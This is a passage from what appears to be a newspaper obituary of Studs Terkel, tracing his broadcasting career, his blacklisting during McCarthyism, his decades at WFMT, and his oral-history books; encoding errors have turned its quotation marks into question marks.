invite composers or performers to sit down for an on-air interview. His passion for jazz led to his first book, ?Giants of Jazz,? (1957) a collection of jazz biographies. In 1950, Mr. Terkel became the star and host of ?Studs? Place,? a variety show set in a barbecue joint, with Mr. Terkel appearing as the owner, shooting the breeze with his staff and with the guest of the week. (In a short-lived precursor of the show, Mr. Terkel played a New York bartender.) Along with Dave Garroway?s talk show and ?Kukla, Fran and Ollie,? the program helped define the relaxed, low-key Chicago school of television. In January, 1952, with McCarthyism in full flower, NBC canceled the show shortly after picking it up for national broadcast, nervous because Mr. Terkel had a habit of signing petitions in support of liberal and left-wing causes. Executives in New York told him that he could clear his record by saying that he had been duped into signing the petitions. Mr. Terkel refused. ?Duped? made him sound stupid, he said. Blackballed from commercial radio, Mr. Terkel found work in the theater, appearing in a national tour of ?Detective Story? and in other plays. One day, in October, 1952, he was surprised to hear Woody Guthrie on the radio. ?I wondered, who plays Guthrie records except me?? he later recalled. ?So I called WFMT. They were delighted to hear from me.? In a partnership that would endure for more than 45 years, Mr. Terkel broadcast a daily hour of music, commentary and interviews, helping to build WFMT into a major fine-arts station syndicated around the country. Although he shied away from actors and politians, anyone else was fair game, and the guest roster include figures as diverse as John Kenneth Galbraith, Garry Wills, Aaron Copland and Oliver Sacks. In 1980 he won a Peabody Award for excellence in journalism. His official title at the station, where he was instantly recognizable by his wayward white hair, red-and-white-checked shirts, and well-chewed cigar, was Free Spirit. In the 1960s, Andr? Schiffrin, the publisher and editor who ran Pantheon Books, was looking for a writer to produce the American equivalent of Jan Myrdal?s ?Report from a Chinese Village,? a collection of interviews that shed light on the lives of ordinary Chinese under Mao. He called Mr. Terkel and suggested Chicago as a subject. Mr. Terkel went out into the city?s neighborhoods, tape recorder in hand, and produced ?Division Street,? an enormous success and the beginning of a lifelong relationship in which Mr. Schiffrin would propose an idea and Mr. Terkel would execute it. ?Division Street? consisted of transcripts of 70 conversations that Mr. Terkel had with people of every sort in and around Chicago. Peter Lyon, reviewing it in The New York Times Book Review, said it was ?a modern morality play, a drama with as many conflicts as life itself.? In ?The Great Divide: Second Thoughts on the American Dream? (1989), he returned to an earlier subject and looked at it afresh. When Random House executives forced out Mr. Schiffrin as head of Pantheon, Mr. Terkel walked out with him, bringing his work to Mr. Schiffrin?s New Press, which published ?My American Century,? a ?best of? compilation. It was followed by three more volumes of memoirs, ?My American Century? (1997) ?Touch and Go? (2007), and the forthcoming ?P.S. : Further Thoughts from a Lifetime of Listening,? which is due out on Nov. 11. In 1997 he received the National Book Foundation Medal to honor his contributions to American letters. In ?Talking to Myself: A Memoir of My Times,? Mr. Terkel took on his toughest interview, and many critics found the book frustrating for its refusal to delve too deeply into its author?s personal life and feelings. Mr. Terkel acknowledged the justice of the complaint. ?I?ve met hundreds, no, I?ve met thousands of interesting people, and I?ve been so caught up with them and fasinated by them and intrigued with them it?s almost like there?s no room inside me to be interested in my own feelings and thoughts,? he told an interviewer. It may be the one time in his life that Mr. Terkel?s ruling passion failed him. ?I don?t have to stay curious, I am curious, about all of it, all the time,? he once said. ? ?Curiosity never killed this cat ? that?s what I?d like as my epitaph.?